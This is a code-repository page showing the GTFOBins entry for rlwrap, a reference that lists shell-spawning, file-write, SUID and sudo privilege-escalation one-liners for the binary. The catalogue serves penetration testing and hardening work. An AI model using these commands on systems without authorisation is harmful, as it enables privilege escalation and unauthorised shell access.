This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
d6895f367d8440f95d3cdd4624becf341684049f
GTFOBins.github.io
/
_gtfobins
/
rlwrap.md
Emilio Pinna
d6895f367d
Reorder functions in binaries
2018-07-04 19:26:52 +01:00
369 B
Raw
Blame
History
functions
functions
execute-interactive
file-write
suid-enabled
sudo-enabled
code
rlwrap /bin/sh
description
code
This adds timestamps to the output file. This relies on the external `echo` command.
LFILE=file_to_write rlwrap -l "$LFILE" echo data
code
./rlwrap -H /dev/null /bin/sh -p
code
sudo rlwrap /bin/sh
Reference in New Issue
View Git Blame
Copy Permalink